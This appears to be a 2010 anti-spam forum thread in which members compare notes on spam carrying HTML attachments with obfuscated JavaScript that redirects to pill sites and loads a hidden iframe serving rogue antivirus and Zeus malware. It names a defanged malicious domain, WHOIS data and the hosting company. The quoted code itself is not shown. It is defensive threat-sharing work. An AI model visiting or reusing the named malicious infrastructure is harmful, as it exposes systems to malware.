InBoxRevenge KS Forum

This post quotes malicious javascript, but the code has been disabled by being enclosed in "[code]" brackets. - Alpha


My apologies if this has already been discussed. Is anyone else seeing spam, that delivers an .html attachment with obfuscated javascript in it? Something like:



If you break it up, you find the malicious url is hxxp://mabcom[dot]net . This URL then contains a redirect to a final spam site, typically pillz or replica watches. But also contains a hidden iframe, linking to a site that in this case contained RogueAV and Zeus.

The reason I ask is that the messages are rapidly changing, and throwing up way more javascript garbage to wade through for the redirect url. This morning alone I've seen 9 different subject lines.

And a final note to the lengthy (sorry!) post, a number of these redirect sites have been hosted with HostRocket.com. Has anyone had issues with them in the past? They have been responsive with takedown requests, but I find it odd they continue to be a problem.

Avira AntiVir doesn't like your post!

But it's pretty sensitive and will alarm if it sees javascript that's just too sneaky-looking, even if it's disabled. I added code brackets to be sure it's dead.

I don't recall problems with HostRocket. Is it a lot of issues in a short interval, or consistent occurrences over a long time period?

They are inexpensive, offer unlimited bandwidth, and allow an unlimited numbers of domain names for the same hosting package, so those features might be attractive to spammers with a lot of throwaway domains. Spammers often use stolen credit cards to pay anyway, but if the monthly fee is low, it's less likely to be noticed on the victim's bill or questioned by the hosting company at the time of signup.

It's also difficult to do aggressive enforcement on that kind of budget -- HostRocket may mean well, but may have resigned themselves to doing no more than responding to complaints, without doing any further investigation of the customers causing the complaints.

Sorry about that, nothing like a quick test of the AV I suppose.

I'm just noticing issues with HostRocket and I've seen a few posts around various sites that indicate there has been issues before. I think you might be right though, they have a nice set of services that make them easily abused. But to their credit after a 30 minute wait on hold they did get the malicious content from a site removed in a matter of minutes.

I may give them a call and see if I can chat with someone above tier 1 regarding this spam campaign. I hate to see them abused, especially given this spam is doing a decent job of evading filters, at least our filters anyway.

It's worth a try. It's good to remember that most of us have learned a huge amount about the spammer economy since we started reporting, and abuse desk people simply don't know as much about it as we do. Most people are blown away when they find out how blatantly illegal a lot of these slick-looking websites are. Administrators can go from apathetic to on-the-warpath pretty quickly when they realize they've been played for fools.

Analyzing - the corrupted domain and its name servers are long standing, so likely to be infiltrated.

WHOIS look-ups
1.
Domain Name: MABCOM.NET
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.HRNOC.NET
Name Server: DNS2.HRNOC.NET
Status: ok
Updated Date: 19-jan-2010
Creation Date: 21-jan-2004
..
2.
Name server
Domain Name: HRNOC.NET
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.HRNOC.NET
Name Server: DNS2.HRNOC.NET
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 16-feb-2007
Creation Date: 12-nov-2001
..
Technical Contact:
HostRocket.Com
HostRocket Customer ([email protected])
+1.5183713421
Fax:
21 Corporate Drive
Clifton Park, NY 12065
US

Web site mabcom.net is in Dutch, google translated as

Despite the ridiculous nature of these javascript obfuscation messages, I wanted to post a follow up to this as a couple of people have mentioned having issues with these specific fraud/maleware spam messages. For whatever reason commercial spam filtering vendors are not detecting these messages very well. An example that made it through today:



This tripped up a number of users who clicked the html attachment to see "what they sent". Which naturally contains a mixture of javascript garbage, and a redirection to some bad sites.

For anyone else getting tripped up by this, the URL's used in the spam are fairly obvious, I'm happy to share what info I have as the campaign changes. We've taken the approach of simply blocking the URL's as we identify them, as they typically seem to only use 1-3 different urls a week. Thanks for info so far on this all, hopefully this helps others a bit as well.

This one has been recently spamming crap out of my accounts.
On a related note: someone recently updated their blog to say the obvious.

Zbot/Zeus botnets aren’t going away
http://www.thesecurityblog.com/2010/07/zbotzeus-botnets-aren’t-going-away/

Also interesting to note: in July 2010, researchers at TrendMicro published an analysis called in PDF format with 21 pages about Zeus (also note its other malware names: ZBOT, WSNPoem, PRG, JabberZeuS, etc.): ZeuS: A Persistent Cybercrime Enterprise.

It mentions that ZeuS is targeting Russian banks. Also worthy to mention is credit is given to the ZeuSTracker which actively posts infected domains, IPs, ASNs, etc.

Well, if that won't create some hassle in the Russian law enforcement circles, then I don't know what will. But if it takes some duma members to lose their savings or some FSB officer to be stolen of his credit card number before they start taking cybercrime seriously, so be it.